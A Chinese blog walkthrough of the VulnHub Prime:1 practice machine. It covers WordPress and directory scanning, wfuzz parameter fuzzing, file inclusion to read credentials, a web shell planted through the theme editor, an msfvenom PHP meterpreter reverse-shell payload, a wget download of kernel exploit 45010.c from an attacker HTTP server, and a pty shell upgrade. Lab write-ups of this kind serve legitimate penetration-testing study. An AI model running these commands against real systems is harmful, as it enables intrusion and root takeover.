渗透测试——prime1靶场实战演练{常用工具}端口转发

文章目录

概要

靶机地址:https://www.vulnhub.com/entry/prime-1,358

信息搜集

nmap

扫网段存活ip及端口

找到除了网关外的ip,开放了80端口,登上去看看

是一个网站,直接上科技扫一扫目录

python 复制代码
 python dirsearch.py -u http://192.168.203.152

扫从出来了常见的wordpress,nice。

那么就使用wpscan...

python 复制代码
wpscan --url http://ip/wordpress/ --e u

扫到一个用户victor,联想到靶机开放了22ssh,那么找到密码就可以尝试进ssh。

没有别的关键信息,换几个扫描工具试试了。。。

python 复制代码
# dirb http://192.168.203.152 -X .zip,.txt,.rar,.php

找到image.php,index.php,sevret.txt

再看看别的工具

python 复制代码
# gobuster dir -u http://192.168.203.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.tar,.zip

一样的效果,看来就这些了

再换几个工具试试

python 复制代码
dirsearch -u http://192.168.203.152  -e zip,php,txt,rar,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

这个速度好慢啊,而且结果不是那么明白。

换一个

python 复制代码
feroxbuster -u http://192.168.203.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

速度比dirsearch快一点点,结果还是不理想。只扫出来wp。

接下来把搜集到的东西挨个去访问,前两个都是图片,有个secret.txt打开是提示。。

让我们查看location.txt,试试能看吗。

让我们使用fuzz来测试参数,那么就应该想到文件包含了,先试试fuzz

python 复制代码
apt-get install wfuzz 

 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw=12 "http://192.168.203.152//index.php?FUZZ=aaaa"

隐藏掉所有响应报文字数为 12 的结果后得到了一个 file 参数:

利用file去包含location.txt

让我们在其他php页面使用那个参数,那么很明显就剩一个了。

更换参数发现没啥显示,尝试文件包含试试

直接包含到大动脉了,

仔细找找看看能有啥发现

这个是显示两个用户,一个victor,一个saket,还显示某个地方存在一个passwd文件,

试试文件包含

那么这个应该是victor的密码了,尝试ssh登录

明显没有那么简单就上去,那么就想想这个密码会是什么地方的?

"wordpress"

前面是扫出来了登录页面的

我们去试试看能登陆上吗

先试试victor

发现直接登录了,

找一下有没有可以写入文件的地方

找到了一处有更新按钮的php文件

里面还有人留下过东西,那么应该就是这了

那就上大动作

蚁剑上

这个是路径

python 复制代码
http://192.168.203.152/wordpress/wp-content/themes/twentynineteen/secret.php

似乎有点太顺利了,

果然尝试nc,python等反弹shell方法均无效,那么就

只能想其他办法了

msfvenom 嗯

因为电脑已经开了一个win虚拟机,靶机,再开一个kali直接爆炸了,

于是我

直接用我昨天做的隔空kali
有兴趣去上一个作品

服务器开了,kali去连接就行了,接下来的数据都通过服务器处理

现在才觉得

顺序是多么重要。

刚刚在上面使用命令知道了,这个内核是有漏洞的,所以直接使用

看见有个45010.c

把他下载下来,

python 复制代码
searchsploit -m exploit/linux/local/45010.c

然后上msf

python 复制代码
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.128 lport=4444 -f raw -o shell.php

这个我使用的公网转发,用内网地址代替了,其实是用公网转发到另一套电脑的。

然后就把生成的shell的内容复制到secret.php,并更新他,

接着就是msf组合拳

msfconsole

为啥是127.0.0.1,因为做了转发 ,没明白的看下上一篇。

这样就打进shell了,上面我们还下载了45010.c内核漏洞提权文件

然后我们用python打开一个http服务来让另一台电脑能访问并下载我们的文件。

python 复制代码
python -m http.server 8888

监听一下 ,在msf里面操作下载文件,

python 复制代码
wget http://192.168.199.128/45010.c#desktop
#在哪里打开的就是根目录,直接跟上文件就行 

因为这个是在蚂蚁中完成的,所以图是这样的

不影响接下来的提权

在msf里面试试也是不行,

但是我发现靶机是有python的

所以想到了pty伪终端

利用python的pty模块创建一个伪终端,

python 复制代码
 python -c:‌这是Python命令行工具的一个选项,‌用于执行紧跟在-c后面的Python代码。‌
 import pty;:‌这行代码导入了Python的pty模块,‌该模块提供了一些用于创建和管理伪终端的功能。‌
 pty.spawn('/bin/bash');:‌这行代码使用pty模块的spawn函数来启动一个新的bash shell。‌/bin/bash是bash shell的默认路径,‌spawn函数会创建一个新的进程,‌并在该进程中运行指定的命令(‌在这个例子中是bash shell)‌。‌
          python3 -c "import pty;pty.spawn('/bin/bash');"
然后给编译的450加个执行的权限

发现不能执行,找到了tmp文件夹,发现可以执行,所以直接来试试

ok了查看root文件夹

这就是密钥吧

exit退出后使用sudo -l再看看

发现enc可以以root方法执行

找了一下备份密码

python 复制代码
find / -name '*backup*' 2>dev/nul

然后去执行enc

生成了两个文档

需要解密才行

剩下的交给以后的我,

把基础先学会了。

相关推荐
Spring_java_gg2 小时前
如何抵御 Linux 服务器黑客威胁和攻击
linux·服务器·网络·安全·web安全
独行soc3 小时前
#渗透测试#SRC漏洞挖掘#深入挖掘XSS漏洞02之测试流程
web安全·面试·渗透测试·xss·漏洞挖掘·1024程序员节
newxtc3 小时前
【国内中间件厂商排名及四大中间件对比分析】
安全·web安全·网络安全·中间件·行为验证·国产中间件
mingzhi611 天前
渗透测试-快速获取目标中存在的漏洞(小白版)
安全·web安全·面试·职场和发展
安胜ANSCEN1 天前
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
网络·安全·web安全·威胁检测·自动化响应
超栈1 天前
蓝桥杯-网络安全比赛题目-遗漏的压缩包
前端·网络·sql·安全·web安全·职场和发展·蓝桥杯
黑龙江亿林等级保护测评1 天前
DDOS防护介绍
网络·人工智能·安全·web安全·智能路由器·ddos
kali-Myon1 天前
NewStarCTF2024-Week5-Web&Misc-WP
前端·python·学习·mysql·web安全·php·web
知孤云出岫1 天前
网络安全渗透实际案例
安全·web安全